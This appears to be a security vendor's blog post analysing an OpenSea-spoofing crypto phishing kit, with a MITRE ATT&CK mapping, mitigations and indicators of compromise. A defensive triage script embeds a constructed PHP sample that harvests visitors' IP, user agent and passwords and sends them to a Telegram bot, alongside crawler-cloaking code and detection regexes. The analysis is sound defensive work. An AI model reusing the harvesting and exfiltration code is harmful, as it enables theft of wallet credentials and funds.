The growing allure of cryptocurrencies draws both investors and cybercriminals to the digital finance sphere, and phishing nets targeting crypto wallets and businesses have emerged as a key threat. These schemes exploit the trust users place in established cryptocurrency services, using deceptive pages to steal digital assets from unsuspecting consumers.
This blog digs into the internal workings of a recently discovered phishing kit that was painstakingly crafted to spoof the OpenSea platform, a leading marketplace for NFTs and digital collectables. Through an in-depth analysis, we identify the fraudsters' tactics for collecting sensitive user information.
Anatomy of Crypto Phishing Kit
Findings
The Bolster researchers discovered a phishing kit on the CheckPhish platform that impersonated OpenSea. The kit is designed to collect IP addresses, operating systems, and passwords from crypto wallet users and then exfiltrate them through a Telegram bot, a popular strategy in most current phishing efforts. The wallets being targeted are OpenSea, MetaMask, Trust Wallet, WalletConnect, Coinbase, Crypto, and Ledger.
Analysis
CrawlerDetect is an open-source PHP class that detects bots, crawlers, and spiders using the User-Agent and http_from headers; it currently recognizes thousands of them. The kit bundles it so that automated scanners are served something other than the phishing page, keeping the page out of detection systems while real visitors still reach it.
The PHP script is part of the phishing campaign targeting OpenSea users, gathering their personal information such as IP address, operating system, and passwords, then passing this data to attackers via Telegram for unauthorized access or exploitation.
This JavaScript code defines functions that open new browser windows with specific dimensions for various cryptocurrency wallets (e.g., MetaMask, Trust Wallet, WalletConnect, Coinbase, Crypto.com, and Ledger) and disable certain browser features, most likely to mimic legitimate wallet login pages as part of the phishing scheme.
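As an added illustration of the detection side (example code written for this post, not the kit's code or Bolster's tooling), the following Python triage script scans a kit's files for the traits described above: CrawlerDetect gating, harvesting of IP/OS/password fields, wallet pop-up windows, and Telegram Bot API exfiltration, and pulls out the bot token and chat ID as IOCs. The sample kit files, the token, and the chat ID are constructed placeholders, not values from the real kit.

```python
import re

# Constructed sample of a kit's files, written for this example (not the real kit's code).
TOKEN = "0000000000:" + "A" * 35   # placeholder shaped like a Telegram bot token
CHAT = "123456789"                  # placeholder chat id
SAMPLE_KIT = {
    "index.php": (
        '<?php\nrequire "vendor/autoload.php";\nuse Jaybizzle\\CrawlerDetect\\CrawlerDetect;\n'
        '$cd = new CrawlerDetect;\nif ($cd->isCrawler()) { header("Location: https://example.invalid/"); exit; }\n'
    ),
    "send.php": (
        f'<?php\n$token = "{TOKEN}";\n$chat_id = "{CHAT}";\n'
        '$text = "IP: ".$_SERVER["REMOTE_ADDR"]." OS: ".$_SERVER["HTTP_USER_AGENT"]." pass: ".$_POST["password"];\n'
        'file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=".urlencode($text));\n'
    ),
    "wallets.js": "function openMetaMask(){window.open('mm.html','mm','width=360,height=640,toolbar=no');}\n",
}

# Traits of the kit described in the analysis, expressed as regex rules.
RULES = {
    "telegram_exfil": re.compile(r"api\.telegram\.org/bot", re.I),
    "crawler_gating": re.compile(r"CrawlerDetect|isCrawler\s*\(", re.I),
    "data_harvest": re.compile(r"REMOTE_ADDR|HTTP_USER_AGENT|\$_POST\[\s*['\"](?:pass|seed|phrase|pin)", re.I),
    "wallet_popup_spoof": re.compile(r"window\.open\([^)]*(?:toolbar|menubar|location)=no", re.I),
}
BOT_TOKEN = re.compile(r"(?<![\w-])\d{8,10}:[\w-]{35}(?![\w-])")   # <bot id>:<35-char secret>
CHAT_ID = re.compile(r"chat_id\W{0,5}(\d{6,12})")

def scan_kit(files):
    """Return (file, rule) hits plus any Telegram bot tokens / chat ids found, for use as IOCs."""
    report = {"findings": [], "tokens": [], "chat_ids": []}
    for name, body in files.items():
        for label, rx in RULES.items():
            if rx.search(body):
                report["findings"].append((name, label))
        report["tokens"] += BOT_TOKEN.findall(body)
        report["chat_ids"] += CHAT_ID.findall(body)
    return report

def is_phishing_kit(report):
    """Verdict: visitor data is harvested AND shipped out over the Telegram Bot API."""
    labels = {label for _, label in report["findings"]}
    return {"data_harvest", "telegram_exfil"} <= labels

if __name__ == "__main__":
    r = scan_kit(SAMPLE_KIT)
    for name, label in r["findings"]:
        print(f"{name}: {label}")
    print("tokens:", r["tokens"], "chat_ids:", r["chat_ids"], "verdict:", is_phishing_kit(r))
```

The extracted token and chat ID can be blocked at the egress proxy or added to a watchlist; the rule hits give an analyst a quick map of which file plays which role in the kit.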
MITRE ATT&CK
Understanding an adversary's tactics and techniques is critical for building strong security measures and preventing potential threats. The MITRE ATT&CK mapping derived from analysis of the webpage and phishing kit is given below:
ID | Tactic | Technique | Procedure |
---|---|---|---|
T1589 | Reconnaissance | Gather Victim Identity Information | Using CrawlerDetect, the adversary can tell whether a visitor is a real potential victim or an automated system, focus on real users, and improve the kit's stealth and efficacy by evading automated detection measures. |
T1591 | Reconnaissance | Gather Victim Org Information | The adversary gathered information on OpenSea, MetaMask, Trust Wallet, WalletConnect, Coinbase, Crypto, and Ledger, such as social media pages, logos, and website details, to build the scam page and phishing kit. |
T1583 | Resource Development | Acquire Infrastructure | The adversary uses domains, C2 servers, and Telegram. |
T1566 | Initial Access | Phishing | The kit fools people into believing they are interacting with legitimate OpenSea pages, giving the adversary first access to their information. |
T1204 | Execution | User Execution | Victims carry out the attack themselves by engaging with the fake OpenSea page, specifically by attempting to log in through the fake cryptocurrency wallet windows generated by the JavaScript code. |
T1027 | Defense Evasion | Obfuscated Files or Information | The adversary encrypted and obfuscated a major portion of the phishing kit to hide the purpose and functions of the scripts. |
T1562 | Defense Evasion | Impair Defenses | The JavaScript routines that disable browser functionality are also intended to weaken safeguards that would otherwise warn users about the phishing attempt. |
T1056 | Credential Access | Input Capture | The PHP script gathers personal information such as IP addresses, operating systems, and passwords. |
T1056 | Collection | Input Capture | The PHP script gathers personal information such as IP addresses, operating systems, and passwords. |
T1113 | Collection | Screen Capture | Phishing kits that mimic wallet login screens collect user inputs (passwords, PINs, etc.) as part of their collection phase. |
T1071 | Command and Control | Application Layer Protocol | Data exfiltration to the attackers over Telegram shows the use of an application layer protocol for command and control communication. |
T1041 | Exfiltration | Exfiltration Over C2 Channel | The acquired data, including personal and authentication information, is sent to the attackers via the Telegram bot, which serves as the C2 (Command and Control) channel. |
T1565 | Impact | Data Manipulation | The stolen login passwords and other sensitive information are used to conduct illicit transactions, drain wallets, or compromise further accounts, directly affecting the victim's digital assets. |
Impact & Mitigation
IMPACT | MITIGATION |
---|---|
Breach and loss of personally identifiable information such as IP address, operating system, and passwords. | Implementing advanced security controls, such as two-factor authentication (2FA) for wallet access and transactions, provides additional protection against illegitimate access. |
Loss of wallet funds and assets, leading to financial loss. | Use only legitimate websites and official social media channels for transactions. |
Damage to brand reputation. | Immediately report any fraudulent transaction observed in the account or wallet. |
Phishing Nets are Evolving
The inventiveness of phishing attacks directed at cryptocurrency wallets and companies is a stark reminder of the constant care needed to safeguard digital assets in the ever-changing realm of digital finance.
These scams borrow the names of trusted cryptocurrency wallets and companies to deceive unsuspecting individuals, preying on their confidence and on human error.
An increasing number of proficient attackers are drawn to cryptocurrencies by their growing popularity, aiming to profit from the expanding market. Individuals and organizations must stay current on the latest phishing strategies and establish comprehensive security processes.
Proactive investigation and vigilant monitoring are critical for detecting and limiting the efforts of those behind sophisticated phishing campaigns, especially as new attack methods arise.
Our analysis emphasizes the importance of ongoing monitoring and forward-thinking countermeasures against these threats.
Appendix
IOC type | Indicator |
---|---|
Website | opensea-claim[-]item[.]lanzavac[.]com |
IP | 185.94[.]230.197 |
File hash (opensea.zip) | 82bfa1ce7ee626671a238b1d3a7f9b4b47c342a9492315fd48abd2691a6937bf |
File hash (openseaupdated.zip) | 42f8959cc65ea9e5508d2d0172c83ce5b9b658d7655d8e2a8e09dc58de33ce97 |
Telegram Bot API token | 7128876958:AAECW33NKPph97ripVVGiAW4PALxM3-Pi4Q |
Telegram Chat ID | 6530923855 |